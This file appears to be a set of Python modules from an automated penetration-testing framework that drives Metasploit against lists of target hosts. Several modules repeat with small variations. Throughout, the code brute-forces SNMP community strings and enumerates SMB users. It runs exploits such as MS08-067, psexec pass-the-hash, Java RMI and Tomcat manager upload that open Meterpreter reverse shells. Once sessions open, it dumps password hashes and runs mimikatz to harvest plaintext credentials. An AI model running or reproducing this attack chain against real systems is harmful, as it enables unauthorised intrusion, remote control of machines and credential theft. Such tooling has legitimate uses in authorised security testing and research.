def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/snmp/snmp_login\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set VERSION 2c") msf.execute("run\n") result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) parts = re.findall(".*LOGIN SUCCESSFUL.*", result) for part in parts: callFire = True # Add all relevant details p = part.split() comString = p[p.index("SUCCESSFUL:") + 1] self.addVuln( t, "snmpCred", { "port": "161", "message": str(part), "communityString": comString, "output": outfile.replace("/", "%2F") }) if callFire: self.fire("snmpCred") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: users = kb.get("host/" + t + "/user") for user in users: hashes = kb.get("host/" + t + "/user/" + user + "/fullhash") for passhash in hashes: # verify we have not tested this host before if not self.seentarget(t + user + passhash): # add the new IP to the already seen list self.addseentarget(t + user + passhash) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/windows/smb/psexec\n") # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n") # msf.execute("set LHOST %s\n" % self.config['lhost']) # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort())) # msf.execute("set LPORT 4444\n") msf.execute("set RPORT 445\n") msf.execute("set RHOST " + t + "\n") msf.execute("set SMBUser " + user + "\n") msf.execute("set SMBPass " + passhash + "\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = msf.getResult() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) parts = re.findall( ".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("host/" + t + "/msfSession/" + str(part)) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("getuid\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") outfile = self.config[ "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in text.splitlines(): m = re.match(r'^\s*Server username: (.*)\s*', line) if (m): self.display.verbose("Metasploit Session [" + s + "] running as user [" + m.group(1).strip() + "]") msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("sysinfo\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") outfile = self.config[ "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in text.splitlines(): m = re.match(r'^\s*OS\s\s*: (.*)\s*', line) if (m): self.display.verbose("Metasploit Session [" + s + "] running on OS [" + m.group(1).strip() + "]") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for comString in comStrings: myMsf.lock.acquire() msf.execute( "use auxiliary/scanner/snmp/snmp_enumusers\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() myMsf.lock.release() outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Extract usernames from results and add to KB parts = re.findall(".* users: .*", result) for part in parts: userlist = (part.split(':')[2]).split(',') for username in userlist: kb.add("creds/host/" + t + "/username/" + username.strip()) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("hashdump\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") # TODO - process results and store results in KB # regex match on [^:]+:[^:]+:[^:]+:[^:]+::: outfile = self.config[ "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("load mimikatz\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("wdigest\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") # TODO - process results and store results in KB outfile = self.config[ "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/smb/smb_enumusers\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("run\n") # msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() # TODO - process results and store user list to KB # need to do something better with this. # loop over each user and store in the KB # if local, store in "/host/" + t + "/user/" + user # if domain, store in "/domain/" + domainname + "/user/" + user # for now, just print out the results # MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras) parts = re.findall(".*" + t.replace(".", "\.") + ".*", result) for part in parts: if "RHOSTS" in part: pass else: try: pieces = part.split() domain = pieces[3] kb.add("domain/" + domain.strip() + "/host/" + t) extras = part.split('(')[1].split(')')[0] users = part.split('[')[3].split(']')[0].split(',') for user in users: kb.add("host/" + t + "/user/" + user.strip()) except: pass outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('shell/' + t + '/msf') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) myMsf.lock.acquire() msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("hashdump\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") msf.sleep(int(self.config['msfexploitdelay'])) # TODO - process results and store results in KB # regex match on [^:]+:[^:]+:[^:]+:[^:]+::: outfile = self.config[ "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() myMsf.lock.release() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("load mimikatz\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("wdigest\n") msf.sleep(int(self.config['msfexploitdelay'])) msf.execute("background\n") # TODO - process results and store results in KB outfile = self.config[ "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: # verify we have not tested this host before if not self.seentarget(t + p): # add the new IP to the already seen list self.addseentarget(t + p) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute( "use auxiliary/scanner/http/tomcat_mgr_login\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set RPORT %s\n" % p) msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) for line in result.splitlines(): m = re.match(r'.*Successful: (.*):(.*)', line) if (m): self.display.error("Tomcat on [" + t + ":" + p + "] has default creds of [" + m.group(1).strip() + "]/[" + m.group(2).strip() + "]") kb.add("creds/service/tomcat/" + t + "/tcp/" + p + "/username/" + m.group(1).strip() + "/password/" + m.group(2).strip()) self.fire("newTomcatPassword") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/x11/open_x11\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("run\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) parts = re.findall(".*Open X Server.*", result) for part in parts: callFire = True self.addVuln( t, "openX11", { "port": "6000", "message": str(part), "output": outfile.replace("/", "%2F") }) # Nothing to trigger? if callFire: self.fire("x11Access") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("host/" + t + "/vuln/snmpCred/communityString") for comString in comStrings: msf.execute( "use auxiliary/scanner/snmp/snmp_enumshares\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("run\n") result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Don't need to parse out IP, we are running module one IP at a time # Just find lines with - and pull out share name parts = re.findall(".* - .*", result) for part in parts: sharename = (part.split('-')[0]).strip() kb.add("host/" + t + "/share/smb/" + sharename) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/multi/misc/java_rmi_server\n") msf.execute("set RHOST %s\n" % t) #msf.execute("set TARGET 0\n") msf.execute("set TARGET 2\n") msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp") msf.execute("set LPORT 4445\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) parts = re.findall(".*Meterpreter session.*", result) for part in parts: callFire = True self.addVuln(t, "JavaRMI", {"port": "1099", "output": outfile.replace("/", "%2F")}) if callFire: self.fire("msfSession") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/multi/misc/java_rmi_server\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set TARGET 0\n") msf.execute("set PAYLOAD java/meterpreter/reverse_tcp\n") msf.execute("run\n") msf.sleep(5) outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = msf.getResult() Utils.writeFile(result, outfile) parts = re.findall(".*Meterpreter session.*", result) for part in parts: callFire = True self.addVuln(t, "JavaRMI", { "port": "1099", "output": outfile.replace("/", "%2F") }) if callFire: self.fire("msfSession") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() for t in self.targets: sessions = kb.get('host/' + t + '/msfSession') if len(sessions) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if msf.isAuthenticated(): # loop over each target for s in sessions: # verify we have not tested this session before if not self.seentarget(s): # add the new IP to the already seen list self.addseentarget(s) msf.execute("sessions -i " + str(s) + "\n") msf.execute("getuid\n") msf.execute("background\n") # TODO - process results and store dat to KB outfile = self.config[ "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) msf.execute("sessions -i " + str(s) + "\n") msf.execute("sysinfo\n") msf.execute("background\n") # TODO - process results and store dat to KB outfile = self.config[ "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr( 10) text = msf.getResult() Utils.writeFile(text, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: users = kb.get("host/" + t + "/user") for user in users: hashes = kb.get ("host/" + t + "/user/" + user + "/fullhash") for passhash in hashes: # verify we have not tested this host before if not self.seentarget(t+user+passhash): # add the new IP to the already seen list self.addseentarget(t+user+passhash) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/windows/smb/psexec\n") # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n") # msf.execute("set LHOST %s\n" % self.config['lhost']) # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort())) # msf.execute("set LPORT 4444\n") msf.execute("set RPORT 445\n") msf.execute("set RHOST " + t + "\n") msf.execute("set SMBUser " + user + "\n") msf.execute("set SMBPass " + passhash + "\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) parts = re.findall(".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("host/" + t + "/msfSession/" + str(part)) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/snmp/snmp_login\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set VERSION 2c\n") msf.execute("run\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) parts = re.findall(".*LOGIN SUCCESSFUL.*", result) for part in parts: callFire = True # Add all relevant details p = part.split() comString = p[p.index("SUCCESSFUL:") + 1] self.addVuln(t, "snmpCred", {"port": "161", "message": str(part), "communityString": comString, "output": outfile.replace("/", "%2F")}) if callFire: self.fire("snmpCred") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString") for comString in comStrings: myMsf.lock.acquire() msf.execute("use auxiliary/scanner/snmp/snmp_enumshares\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() myMsf.lock.release() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Don't need to parse out IP, we are running module one IP at a time # Just find lines with - and pull out share name parts = re.findall(".* - .*", result) for part in parts: sharename = (part.split('-')[0]).strip() kb.add("share/smb/" + t + "/" + sharename) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/x11/open_x11\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() myMsf.lock.release() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) parts = re.findall(".*Open X Server.*", result) for part in parts: callFire = True self.addVuln(t, "openX11", {"port": "6000", "message": str(part), "output": outfile.replace("/", "%2F")}) # Nothing to trigger? if callFire: self.fire("x11Access") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) # Get list of working community strings for this host comStrings = kb.get("host/" + t + "/vuln/snmpCred/communityString") for comString in comStrings: msf.execute("use auxiliary/scanner/snmp/snmp_enumusers\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set COMMUNITY %s\n" % comString) msf.execute("run\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # Extract usernames from results and add to KB parts = re.findall(".* users: .*", result) for part in parts: userlist = (part.split(':')[2]).split(',') for username in userlist: kb.add("host/" + t + "/user/" + username.strip()) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: ports = kb.get('service/http/' + t + '/tcp') for p in ports: # verify we have not tested this host before if not self.seentarget(t+p): # add the new IP to the already seen list self.addseentarget(t+p) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/http/jboss_vulnscan\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("set RPORT %s\n" % p) msf.execute("exploit\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" )) for line in result.splitlines(): m = re.match(r'.*Authenticated using (.*):(.*)', line) if (m): self.display.error("Jboss on [" + t + ":" + p + "] has default creds of [" + m.group(1).strip() +"]/[" + m.group(2).strip() + "]") kb.add("creds/service/jboss/" + t + "/port/" + p + "/username/" + m.group(1).strip() + "/password/" + m.group(2).strip()) self.fire("newJbossPassword") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/vnc/vnc_none_auth\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("run\n") result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) Utils.writeFile(result, outfile) parts = re.findall(".*identified the VNC 'none' security type.*", result) for part in parts: callFire = True self.addVuln(t, "VNCNoAuth", {"message": str(part), "output": outfile.replace("/", "%2F")}) if callFire: self.Fire("vncAccess") # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) myMsf.lock.acquire() self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use exploit/windows/smb/ms08_067_netapi\n") msf.execute("set TARGET 0\n") msf.execute("set RHOST " + t + "\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10) result = msf.getResult() myMsf.lock.release() Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) parts = re.findall(".*Meterpreter session (\d+) opened.*", result) for part in parts: self.fire("msfSession") self.display.verbose("NEW session on : " + t) kb.add("hell" + t + "/msf/" + str(part)) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new IP to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute("use auxiliary/scanner/smb/smb_enumusers\n") msf.execute("set RHOSTS %s\n" % t) msf.execute("run\n") msf.sleep(int(self.config['msfexploitdelay'])) result = msf.getResult() while (re.search(".*execution completed.*", result) is None): result = result + msf.getResult() # MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras) parts = re.findall(".*" + t.replace(".", "\.") + ".*", result) for part in parts: if "RHOSTS" in part: pass else: try: pieces = part.split() domain = pieces[3] kb.add("domain/" + domain.strip() + "/host/" + t) extras = part.split('(')[1].split(')')[0] users = part.split('[')[3].split(']')[0].split( ',') for user in users: kb.add("host/" + t + "/user/" + user.strip()) except: pass outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) Utils.writeFile(result, outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) # clean up after ourselves result = msf.cleanup() return
def process(self): # load any targets we are interested in self.getTargets() if len(self.targets) > 0: # connect to msfrpc msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass']) if not msf.isAuthenticated(): return # If any results are succesful, this will become true and Fire will be called in the end callFire = False # loop over each target for t in self.targets: ports = kb.get('service/http/host/' + t + '/tcpport') for p in ports: users = kb.get("creds/host/" + t + "/port/" + p + "/service/tomcat/username") for user in users: passwords = kb.get("creds/host/" + t + "/port/" + p + "/service/tomcat/username/" + user + "/password") for password in passwords: # verify we have not tested this host before if not self.seentarget(t + p + user + password): # add the new IP to the already seen list self.addseentarget(t + p + user + password) self.display.verbose(self.shortName + " - Connecting to " + t) msf.execute( "use exploit/multi/http/tomcat_mgr_upload\n" ) msf.execute("set RHOST %s\n" % t) msf.execute("set RPORT %s\n" % p) msf.execute("set USERNAME %s\n" % user) msf.execute("set PASSWORD %s\n" % password) msf.execute("set fingerprintcheck false\n") msf.execute("set target 1\n") msf.execute("exploit -j\n") msf.sleep(int(self.config['msfexploitdelay'])) outfile = self.config[ "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr( 10) result = msf.getResult() Utils.writeFile(result, outfile) parts = re.findall(".*Meterpreter session.*", result) for part in parts: callFire = True self.addVuln( t, self.shortName, { "port": p, "username": user, "password": password, "output": outfile.replace( "/", "%2F") }) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) if callFire: self.fire("msfSession") # clean up after ourselves result = msf.cleanup() return
